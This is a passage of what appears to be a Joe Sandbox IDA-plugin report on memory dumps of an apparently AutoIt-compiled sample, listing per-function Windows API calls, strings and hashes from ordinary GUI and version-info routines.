                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                            • String ID:
                                            • API String ID: 1996641542-0
                                            • Opcode ID: 39c8f3336d1e86a9c5a92d2f31ccb5b38c47cb268e8d2d5e5fb73f3c2270cf94
                                            • Instruction ID: 7575cd53636d400ee3db6043e0fc0fcd677cc0e11275b621dca098881873ca3c
                                            • Opcode Fuzzy Hash: 39c8f3336d1e86a9c5a92d2f31ccb5b38c47cb268e8d2d5e5fb73f3c2270cf94
                                            • Instruction Fuzzy Hash: 66615C71901218EFDF119FA9DC48AEEBBB9EF08320F254126F915FB2A1D6719D40DB90
                                            APIs
                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E98D34
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E98D45
                                            • CharNextW.USER32(0000014E), ref: 00E98D74
                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E98DB5
                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E98DCB
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E98DDC
                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E98DF9
                                            • SetWindowTextW.USER32(?,0000014E), ref: 00E98E45
                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E98E5B
                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E98E8C
                                            • _memset.LIBCMT ref: 00E98EB1
                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E98EFA
                                            • _memset.LIBCMT ref: 00E98F59
                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E98F83
                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E98FDB
                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00E99088
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00E990AA
                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E990F4
                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E99121
                                            • DrawMenuBar.USER32(?), ref: 00E99130
                                            • SetWindowTextW.USER32(?,0000014E), ref: 00E99158
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                            • String ID: 0
                                            • API String ID: 1073566785-4108050209
                                            • Opcode ID: a62addfed4f6c4f46f61a0ab70a72c1c62a5c9838b70a40baa53b9e30f789ed4
                                            • Instruction ID: fb21eb8d23daa45e1fe1db2a8392503e40b988db2d80470fbb847280c226042e
                                            • Opcode Fuzzy Hash: a62addfed4f6c4f46f61a0ab70a72c1c62a5c9838b70a40baa53b9e30f789ed4
                                            • Instruction Fuzzy Hash: 6EE1A270901209AFDF209F65CC88EEE7BB9FF05714F10915AF915BA2A1DB708A85DF60
                                            APIs
                                            • GetCursorPos.USER32(?), ref: 00E94C51
                                            • GetDesktopWindow.USER32 ref: 00E94C66
                                            • GetWindowRect.USER32(00000000), ref: 00E94C6D
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E94CCF
                                            • DestroyWindow.USER32(?), ref: 00E94CFB
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E94D24
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E94D42
                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E94D68
                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00E94D7D
                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E94D90
                                            • IsWindowVisible.USER32(?), ref: 00E94DB0
                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E94DCB
                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E94DDF
                                            • GetWindowRect.USER32(?,?), ref: 00E94DF7
                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00E94E1D
                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00E94E37
                                            • CopyRect.USER32(?,?), ref: 00E94E4E
                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00E94EB9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                            • String ID: ($0$tooltips_class32
                                            • API String ID: 698492251-4156429822
                                            • Opcode ID: 8dc5277600c526a6fc1cf1993f278eecd11386de29b3d4c0cc460281f801b2ec
                                            • Instruction ID: 5e4a4f91da3349ce79e23ba675959ade933e860da35e5b923f06b10c364e01c0
                                            • Opcode Fuzzy Hash: 8dc5277600c526a6fc1cf1993f278eecd11386de29b3d4c0cc460281f801b2ec
                                            • Instruction Fuzzy Hash: 07B158B1604340AFDB04DF65C849FAABBE4BF88314F00991DF599AB2A2D771EC45CB91
                                            APIs
                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E746E8
                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E7470E
                                            • _wcscpy.LIBCMT ref: 00E7473C
                                            • _wcscmp.LIBCMT ref: 00E74747
                                            • _wcscat.LIBCMT ref: 00E7475D
                                            • _wcsstr.LIBCMT ref: 00E74768
                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E74784
                                            • _wcscat.LIBCMT ref: 00E747CD
                                            • _wcscat.LIBCMT ref: 00E747D4
                                            • _wcsncpy.LIBCMT ref: 00E747FF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                            • API String ID: 699586101-1459072770
                                            • Opcode ID: 7e087d0e888b0996fb6c84b8d9023f9144a39f24092ab38b2a33c1f019e72900
                                            • Instruction ID: fc6575abcabc109f5e8ad47a370a132841fd2ccd0b1b828ab24142ce259cae65
                                            • Opcode Fuzzy Hash: 7e087d0e888b0996fb6c84b8d9023f9144a39f24092ab38b2a33c1f019e72900
                                            • Instruction Fuzzy Hash: BC410771A003147AEB14A7749C4BEBF7BECDF41710F04606AF909F61C2EB759A01D6A5
                                            APIs
                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E128BC
                                            • GetSystemMetrics.USER32(00000007), ref: 00E128C4
                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E128EF
                                            • GetSystemMetrics.USER32(00000008), ref: 00E128F7
                                            • GetSystemMetrics.USER32(00000004), ref: 00E1291C
                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E12939
                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E12949
                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E1297C
                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E12990
                                            • GetClientRect.USER32(00000000,000000FF), ref: 00E129AE
                                            • GetStockObject.GDI32(00000011), ref: 00E129CA
                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E129D5
                                              • Part of subcall function 00E12344: GetCursorPos.USER32(?), ref: 00E12357
                                              • Part of subcall function 00E12344: ScreenToClient.USER32(00ED67B0,?), ref: 00E12374
                                              • Part of subcall function 00E12344: GetAsyncKeyState.USER32(00000001), ref: 00E12399
                                              • Part of subcall function 00E12344: GetAsyncKeyState.USER32(00000002), ref: 00E123A7
                                            • SetTimer.USER32(00000000,00000000,00000028,00E11256), ref: 00E129FC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                            • String ID: AutoIt v3 GUI
                                            • API String ID: 1458621304-248962490
                                            • Opcode ID: e7ce1eb357b56a023cf23e3812753d6bfeda90c6ee4232f9636783ad6dcddd75
                                            • Instruction ID: 98efb1b1a763e1499ff8644df6351fdf6676ec78f80ebae2518f42d721cfa960
                                            • Opcode Fuzzy Hash: e7ce1eb357b56a023cf23e3812753d6bfeda90c6ee4232f9636783ad6dcddd75
                                            • Instruction Fuzzy Hash: 22B15971A0120AAFDB14DFA9DC45BEE7BB4FB48314F10912AFA15F72A0DB74A851CB50
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 00E940F6
                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E941B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharMessageSendUpper
                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                            • API String ID: 3974292440-719923060
                                            • Opcode ID: 612675bff6981203945eb14fa8db64b3051b3457d7e0c7f7f273e822374715ac
                                            • Instruction ID: a066f83402a00ae378b8f79db5bbcbc89ce611e5fad99d2f571c4a737d48cf5e
                                            • Opcode Fuzzy Hash: 612675bff6981203945eb14fa8db64b3051b3457d7e0c7f7f273e822374715ac
                                            • Instruction Fuzzy Hash: E4A160702143019BCB14EF20C952EAAB7E9BF84314F14696DB896BB7D2DB31EC46CB51
                                            APIs
                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00E85309
                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00E85314
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00E8531F
                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00E8532A
                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00E85335
                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00E85340
                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00E8534B
                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00E85356
                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00E85361
                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00E8536C
                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00E85377
                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00E85382
                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00E8538D
                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00E85398
                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00E853A3
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00E853AE
                                            • GetCursorInfo.USER32(?), ref: 00E853BE
                                            • GetLastError.KERNEL32(00000001,00000000), ref: 00E853E9
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Cursor$Load$ErrorInfoLast
                                            • String ID:
                                            • API String ID: 3215588206-0
                                            • Opcode ID: 43268cd1766c35e649c50be2f85b731f5693b23413469ee829e4f00525d9c5d2
                                            • Instruction ID: ae54c0ba95087e96b369f9573310f98bdb524b7ec230fcbbcbfd5dc4688a7090
                                            • Opcode Fuzzy Hash: 43268cd1766c35e649c50be2f85b731f5693b23413469ee829e4f00525d9c5d2
                                            • Instruction Fuzzy Hash: E8417370E443196ADB10AFBA8C4986EFFF8EF51B50B10452FE51DF7291DAB8A4008F51
                                            APIs
                                            • GetClassNameW.USER32(?,?,00000100), ref: 00E6AAA5
                                            • __swprintf.LIBCMT ref: 00E6AB46
                                            • _wcscmp.LIBCMT ref: 00E6AB59
                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E6ABAE
                                            • _wcscmp.LIBCMT ref: 00E6ABEA
                                            • GetClassNameW.USER32(?,?,00000400), ref: 00E6AC21
                                            • GetDlgCtrlID.USER32(?), ref: 00E6AC73
                                            • GetWindowRect.USER32(?,?), ref: 00E6ACA9
                                            • GetParent.USER32(?), ref: 00E6ACC7
                                            • ScreenToClient.USER32(00000000), ref: 00E6ACCE
                                            • GetClassNameW.USER32(?,?,00000100), ref: 00E6AD48
                                            • _wcscmp.LIBCMT ref: 00E6AD5C
                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00E6AD82
                                            • _wcscmp.LIBCMT ref: 00E6AD96
                                              • Part of subcall function 00E3386C: _iswctype.LIBCMT ref: 00E33874
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                            • String ID: %s%u
                                            • API String ID: 3744389584-679674701
                                            • Opcode ID: 71dd08d8742f5eee938298cfc4741e736199177ecc196144a8acc6c89e442f34
                                            • Instruction ID: a81635cf90c448d035881533f0082a4b8df87f4fb18bcb0ca340024dc3e77157
                                            • Opcode Fuzzy Hash: 71dd08d8742f5eee938298cfc4741e736199177ecc196144a8acc6c89e442f34
                                            • Instruction Fuzzy Hash: 38A1D031A44306AFD714DF64D884BAAF7E8FF04389F08652AF999F2191D730E945CB92
                                            APIs
                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 00E6B3DB
                                            • _wcscmp.LIBCMT ref: 00E6B3EC
                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E6B414
                                            • CharUpperBuffW.USER32(?,00000000), ref: 00E6B431
                                            • _wcscmp.LIBCMT ref: 00E6B44F
                                            • _wcsstr.LIBCMT ref: 00E6B460
                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00E6B498
                                            • _wcscmp.LIBCMT ref: 00E6B4A8
                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E6B4CF
                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00E6B518
                                            • _wcscmp.LIBCMT ref: 00E6B528
                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 00E6B550
                                            • GetWindowRect.USER32(00000004,?), ref: 00E6B5B9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                            • String ID: @$ThumbnailClass
                                            • API String ID: 1788623398-1539354611
                                            • Opcode ID: 44c977e0d5fe67ec490693331af062a892240a44069da1d510da39c1c82799f3
                                            • Instruction ID: ccf33febdeadd4427c81f6082846ae6950149ce84a7830947fd97eaca41aff70
                                            • Opcode Fuzzy Hash: 44c977e0d5fe67ec490693331af062a892240a44069da1d510da39c1c82799f3
                                            • Instruction Fuzzy Hash: 9981C4710443059FDB14DF10E885FAA7BE9EF44398F04A56AFD86EA092EB30DD85CB61
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • DragQueryPoint.SHELL32(?,?), ref: 00E9C917
                                              • Part of subcall function 00E9ADF1: ClientToScreen.USER32(?,?), ref: 00E9AE1A
                                              • Part of subcall function 00E9ADF1: GetWindowRect.USER32(?,?), ref: 00E9AE90
                                              • Part of subcall function 00E9ADF1: PtInRect.USER32(?,?,00E9C304), ref: 00E9AEA0
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00E9C980
                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E9C98B
                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E9C9AE
                                            • _wcscat.LIBCMT ref: 00E9C9DE
                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E9C9F5
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00E9CA0E
                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00E9CA25
                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00E9CA47
                                            • DragFinish.SHELL32(?), ref: 00E9CA4E
                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E9CB41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr
                                            • API String ID: 169749273-2073472848
                                            • Opcode ID: 2e285105d9a3432114009c7928d4e0ac7f9290cd3e8ed7735d6ffffcda8c7e6c
                                            • Instruction ID: 0bf259c3753010c555188c97a5d3e7e561d07368856a8f4d255fcd94849b9e9e
                                            • Opcode Fuzzy Hash: 2e285105d9a3432114009c7928d4e0ac7f9290cd3e8ed7735d6ffffcda8c7e6c
                                            • Instruction Fuzzy Hash: DD616A72108300AFC711EF65DC85D9FBBE8EFC8710F10192EF596A61A1DB709A49CB92
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __wcsnicmp
                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                            • API String ID: 1038674560-1810252412
                                            • Opcode ID: 1396877eee38f927607181a22ff840d06336d3141f856c83344f28ec268de2e7
                                            • Instruction ID: 09ebbbcfb59c5e164c30897f7e64f6b8a692ba53265b21f7f5a229bf75308356
                                            • Opcode Fuzzy Hash: 1396877eee38f927607181a22ff840d06336d3141f856c83344f28ec268de2e7
                                            • Instruction Fuzzy Hash: 54316331684305E6DB14FA60DE57FEEBBF89F24B90F60202AF451B10E2EF626E85C551
                                            APIs
                                            • LoadIconW.USER32(00000063), ref: 00E6C4D4
                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E6C4E6
                                            • SetWindowTextW.USER32(?,?), ref: 00E6C4FD
                                            • GetDlgItem.USER32(?,000003EA), ref: 00E6C512
                                            • SetWindowTextW.USER32(00000000,?), ref: 00E6C518
                                            • GetDlgItem.USER32(?,000003E9), ref: 00E6C528
                                            • SetWindowTextW.USER32(00000000,?), ref: 00E6C52E
                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E6C54F
                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E6C569
                                            • GetWindowRect.USER32(?,?), ref: 00E6C572
                                            • SetWindowTextW.USER32(?,?), ref: 00E6C5DD
                                            • GetDesktopWindow.USER32 ref: 00E6C5E3
                                            • GetWindowRect.USER32(00000000), ref: 00E6C5EA
                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E6C636
                                            • GetClientRect.USER32(?,?), ref: 00E6C643
                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E6C668
                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E6C693
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                            • String ID:
                                            • API String ID: 3869813825-0
                                            • Opcode ID: 69fe00d0b3bf16aec39c6a84f198ed1edcacfc99d5752ac2838d14cd257e0d2c
                                            • Instruction ID: 4f3a8c97d4529c54a6519ee378d99f818a32fcaca88c31a991887d1ef888eed9
                                            • Opcode Fuzzy Hash: 69fe00d0b3bf16aec39c6a84f198ed1edcacfc99d5752ac2838d14cd257e0d2c
                                            • Instruction Fuzzy Hash: 0B519E71900709AFDB20DFA9ED89B7EBBF5FF04744F10092AE686B25A1C774A944CB50
                                            APIs
                                            • _memset.LIBCMT ref: 00E9A4C8
                                            • DestroyWindow.USER32(?,?), ref: 00E9A542
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E9A5BC
                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E9A5DE
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E9A5F1
                                            • DestroyWindow.USER32(00000000), ref: 00E9A613
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E10000,00000000), ref: 00E9A64A
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E9A663
                                            • GetDesktopWindow.USER32 ref: 00E9A67C
                                            • GetWindowRect.USER32(00000000), ref: 00E9A683
                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E9A69B
                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E9A6B3
                                              • Part of subcall function 00E125DB: GetWindowLongW.USER32(?,000000EB), ref: 00E125EC
                                            Strings
                                            Memory Dump Source
